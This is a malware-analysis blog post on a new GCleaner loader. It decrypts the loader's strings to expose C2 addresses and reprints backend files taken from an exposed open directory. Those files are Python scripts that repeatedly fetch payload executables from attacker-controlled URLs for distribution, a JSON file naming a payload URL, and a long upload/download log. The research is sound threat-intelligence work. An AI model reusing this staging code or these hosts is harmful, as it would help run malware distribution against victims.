# New Gcleaner
> A look into the the gcleaner backend

- toc: true 
- badges: true
- categories: [gcleaner,loader,debugging,encryption,opendir]

## Overview

This is a new version of GCleaner the infamous NullMixer loader. Previous versions of GCleaner have been much larger binaries with more obfuscation, this new version is simplified with only a few functions used for C2 communication.

### Samples
- Packed `1fda9e004442de3c7a7ace86aeb2f35b982b3680a7ff0052d7992d216c60ce7c`  [UnpacMe](https://www.unpac.me/results/d983bb0d-dea6-4159-9c16-48393bf1d4de)
- Unpacked `110c64b4a03a6ed6c8ffd2baba0a5831fd8bd59ca6b23d6e885a8f34e13461fc` [UnpacMe](https://www.unpac.me/results/d983bb0d-dea6-4159-9c16-48393bf1d4de?hash=110c64b4a03a6ed6c8ffd2baba0a5831fd8bd59ca6b23d6e885a8f34e13461fc#/)

### References 

- [Deep Analysis of GCleaner](https://n1ght-w0lf.github.io/malware%20analysis/gcleaner-loader/)

## Analysis

Though they are using string encryption the encryption is poorly implemented and the key strings are decrypted in the C runtime startup functions and assigned to std::string classes. The encryption is also a simple single-byte XOR but this is irrelevant for our decryption. 

```c
v3 = 0x1B18001C1A001Bi64;
v4 = 773529375;
if ( dword_42BBC4 > *(_DWORD *)(*(_DWORD *)v0 + 4) )
{
    _Init_thread_header(&dword_42BBC4);
    if ( dword_42BBC4 == -1 )
    {
        qword_42BBC8 = v3;
        dword_42BBD0 = v4;
        atexit(sub_41CB90);
        _Init_thread_footer(&dword_42BBC4);
    }
}
if ( HIBYTE(dword_42BBD0) )
{
    for ( i = 0; i < 0xC; ++i )
        *((_BYTE *)&qword_42BBC8 + i) ^= 0x2Eu;
}
dword_42BC68 = 0;
Size = 0;
dword_42BC7C = 15;
assign_string((std_string *)&dword_42BC68, (char *)&qword_42BBC8, strlen((const char *)&qword_42BBC8));
```

By adding a logging breakpoint on the std::string allocation function we can simply dump all the strings before the main() of the malware is reached.

![](https://i.imgur.com/tfNrAEN.png)


```
&"185.172.128.90"
&"5.42.65.115"
&"two"
???
???
"OKD"
&"NOSUB"
&"&s="
&"/cpa/ping.php?substr="
&"185.172.128.90/cpa/ping.php?substr=one&s=two"
&"185.172.128.90/cpa/ping.php?substr=one&s=two"
```


## Gcleaner Backend

While exploring the C2s one of the hosts had an open directory which exposed a portion of the backend of the gcleaner malware distribution network.

![](https://i.imgur.com/0qjWRMN.png)

In addition to the `.php` files used to implement the C2 the backend uses python scripts and a json file used to refesh the payloads that are being distributed. It is also clear that the payloads are geo targeted. In this configuration, one for the EU and one for the US. Some of the payloads are also empty .NET stubs named `Gcleanerapp` [UnpacMe](https://www.unpac.me/results/1e37679b-f3cc-4eb0-b268-a2bbb66b509e).

### `cronUpdate.py`
```python
import json
import requests
from datetime import datetime
import traceback
import time

headers = {
  "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
}

links = {}
try:
  with open("/var/www/html/addons/_links.json", "r") as f:
    links = json.loads(f.read())
except:
  pass

out = "\n" + datetime.now().strftime("%d/%m/%Y, %H:%M:%S") + " update.py\n"

for key in links:
  if (links[key] != "0"):
    try:
      resp = requests.get(links[key], headers = headers)
    except:
      out += f"{key} -> {links[key]} download error =========================\n"
      tr = traceback.format_exc()
      out += f"\n{tr} \n=========================\n"
      continue

    ln = len(resp.content)
    if (ln < 1024):
      out += f"{key} -> {links[key]} < 1024, continue\n"
      continue

    out += f"{key} -> {links[key]} -> downloaded {ln} bytes\n"

    try:
      with open(f"/var/www/html/addons/{key}.file", "wb") as f:
        f.write(resp.content)
    except:
      out += f"{key} -> {links[key]} file write error =========================\n"
      tr = traceback.format_exc()
      out += f"\n{tr} \n=========================\n"

print(out)

try:
  with open(f"/var/www/html/addons/_links.log", "a") as f:
    f.write(out)
except:
  pass
```

### `cupdate.py`

```python
# sudo mcedit /etc/systemd/system/files_updater.service

# [Unit]
# Description=My updater service
# After=multi-user.target
# [Service]
# Type=simple
# Restart=always
# ExecStart=/usr/bin/python3 /var/www/html/update.py
# [Install]
# WantedBy=multi-user.target

# sudo systemctl daemon-reload
# sudo systemctl enable files_updater.service
# sudo systemctl start files_updater.service
# sudo systemctl status files_updater.service
# sudo systemctl restart files_updater.service

import json
import requests
from datetime import datetime
import traceback
import time

headers = {
  "user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.88 Safari/537.36"
}

while True:
  try:
    links = {}
    try:
      with open("/var/www/html/addons/_links.json", "r") as f:
        links = json.loads(f.read())
    except:
      pass

    out = "\n" + datetime.now().strftime("%d/%m/%Y, %H:%M:%S") + " update.py\n"

    for key in links:
      if (links[key] != "0"):
        try:
          resp = requests.get(links[key], headers = headers)
        except:
          out += f"{key} -> {links[key]} download error =========================\n"
          tr = traceback.format_exc()
          out += f"\n{tr} \n=========================\n"
          continue

        ln = len(resp.content)
        if (ln < 1024):
          out += f"{key} -> {links[key]} < 1024, continue\n"
          continue

        out += f"{key} -> {links[key]} -> downloaded {ln} bytes\n"

        try:
          with open(f"/var/www/html/addons/{key}.file", "wb") as f:
            f.write(resp.content)
        except:
          out += f"{key} -> {links[key]} file write error =========================\n"
          tr = traceback.format_exc()
          out += f"\n{tr} \n=========================\n"
    
    print(out)

    try:
      with open(f"/var/www/html/addons/_links.log", "a") as f:
        f.write(out)
    except:
      pass

    time.sleep(30 * 60) # Ð¿Ð¾Ð»Ñ‡Ð°ÑÐ°
  except:
    pass
```

### `_links.json`
```json
{"MIXTWO":"https:\/\/arbiscan.eu\/apple.exe","MIXTEST":"0","two":"0"}
```

### `_links.log`
```

13/12/2023 12:06 up.php -> MIXTWO -> http://http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded < 1024
13/12/2023 12:06 up.php -> MIXTWO -> http://http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded < 1024
13/12/2023 12:09 up.php -> MIXTWO -> http://http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded < 1024
13/12/2023 12:09 up.php -> MIXTWO -> http://http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded < 1024
13/12/2023 12:09 up.php -> MIXTWO -> http://http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded < 1024
13/12/2023 12:10 up.php -> MIXTWO -> http://http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded < 1024
13/12/2023 12:10 up.php -> MIXTWO -> http://http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded < 1024
13/12/2023 12:10 up.php -> MIXTWO -> http://http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded < 1024
13/12/2023 12:10 up.php -> MIXTWO -> http://http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded < 1024
13/12/2023 12:10 up.php -> MIXTWO -> http://http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded < 1024
13/12/2023 12:12 up.php -> mixtwo -> http://http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded < 1024
13/12/2023 12:12 up.php -> mixtwo -> http://http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded < 1024
13/12/2023 12:12 up.php -> mixtwo -> http://http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded < 1024
13/12/2023 12:20 up.php -> MIXTWO -> http://stoon.hitsturbo.com/order/tuc7.exe -> download error
13/12/2023 12:20 up.php -> MIXTWO -> http://stoon.hitsturbo.com/order/tuc7.exe -> download error
13/12/2023 12:20 up.php -> MIXTWO -> http://stoon.hitsturbo.com/order/tuc7.exe -> download error
13/12/2023 12:20 up.php -> MIXTWO -> http://stoon.hitsturbo.com/order/tuc7.exe -> download error
13/12/2023 12:20 up.php -> MIXTWO -> http://stoon.hitsturbo.com/order/tuc7.exe -> download error
13/12/2023 12:20 up.php -> MIXTWO -> http://stoon.hitsturbo.com/order/tuc7.exe -> download error
13/12/2023 12:20 up.php -> MIXTWO -> http://stoon.hitsturbo.com/order/tuc7.exe -> download error
13/12/2023 12:20 up.php -> MIXTWO -> http://stoon.hitsturbo.com/order/tuc7.exe -> download error
13/12/2023 12:20 up.php -> MIXTWO -> http://stoon.hitsturbo.com/order/tuc7.exe -> download error
13/12/2023 12:21 up.php -> MIXTWO -> http://stoon.hitsturbo.com/order/tuc7.exe -> download error
13/12/2023 12:23 up.php -> MIXTWO -> http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded 7463965b
14/12/2023 15:31 up.php -> MIXTWO -> uploaded 84992b
14/12/2023 16:27 up.php -> MIXTWO -> uploaded 4608b
14/12/2023 16:30 up.php -> MIXTWO -> http://stoon.hitsturbo.com/order/tuc7.exe -> downloaded 7580388b
15/12/2023 19:08 up.php -> MIXTWO -> uploaded 4608b
15/12/2023 19:08 up.php -> MIXTWO -> uploaded 158208b
16/12/2023 17:27 up.php -> MIXTWO -> uploaded 4608b
17/12/2023 13:30 up.php -> MIXTWO -> uploaded 587086b
17/12/2023 19:26 up.php -> MIXTWO -> uploaded 4608b
26/12/2023 14:03 up.php -> MIXTWO -> uploaded 1382912b
26/12/2023 17:41 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
)

05/01/2024 18:34 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:34 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:34 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:44 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:58 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:59 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 18:59 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 19:12 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 19:12 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 19:13 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 19:13 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 19:13 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 19:13 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 19:19 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

05/01/2024 19:19 up.php -> ELSE 
GET array (
  'stream' => 'MIXTWO',
)
POST array (
)
FILES array (
  'uploadfile' => 
  array (
    'name' => '2103799296 mixtwo.exe',
    'full_path' => '2103799296 mixtwo.exe',
    'type' => '',
    'tmp_name' => '',
    'error' => 1,
    'size' => 0,
  ),
)

06/01/2024 00:48 up.php -> MIXTEST -> uploaded 267191b
06/01/2024 00:49 up.php -> ELSE 
GET array (
  'stream' => 'MIXTEST',
)
POST array (
)
FILES array (
)

06/01/2024 00:57 up.php -> ELSE 
GET array (
  'stream' => 'MIXTEST',
)
POST array (
)
FILES array (
)

06/01/2024 01:00 up.php -> MIXTEST -> uploaded 267191b
06/01/2024 01:00 up.php -> ELSE 
GET array (
  'stream' => 'MIXTEST',
)
POST array (
)
FILES array (
)

06/01/2024 01:01 up.php -> ELSE 
GET array (
  'stream' => 'MIXTEST',
)
POST array (
)
FILES array (
)

06/01/2024 01:02 up.php -> MIXTEST -> uploaded 8152176b
06/01/2024 01:03 up.php -> MIXTEST -> uploaded 25226464b
06/01/2024 08:02 up.php -> MIXTWO -> uploaded 4608b
06/01/2024 08:02 up.php -> MIXTWO -> uploaded 970501b
06/01/2024 23:12 up.php -> MIXTWO -> uploaded 347136b
07/01/2024 00:11 up.php -> MIXTWO -> uploaded 346624b
07/01/2024 01:12 up.php -> MIXTWO -> https://arbiscan.eu/apple.exe -> downloaded 346624b
08/01/2024 19:19 up.php -> MIXTWO -> uploaded 404992b
08/01/2024 20:38 up.php -> MIXTWO -> uploaded 415744b
08/01/2024 21:14 up.php -> MIXTWO -> uploaded 415232b
09/01/2024 05:28 up.php -> MIXTWO -> https://arbiscan.eu/apple.exe -> downloaded 415232b
09/01/2024 06:06 up.php -> MIXTWO -> uploaded 393216b
09/01/2024 07:49 up.php -> MIXTWO -> https://arbiscan.eu/apple.exe -> downloaded 393216b
10/01/2024 04:59 up.php -> two -> uploaded 372736b
10/01/2024 13:27 up.php -> two -> uploaded 372224b
10/01/2024 22:28 up.php -> two -> uploaded 4608b
11/01/2024 18:01 up.php -> two -> uploaded 1340007b
12/01/2024 12:21 up.php -> two -> uploaded 1270132b
13/01/2024 12:09 up.php -> two -> uploaded 1236456b
15/01/2024 13:30 up.php -> two -> uploaded 1220326b
```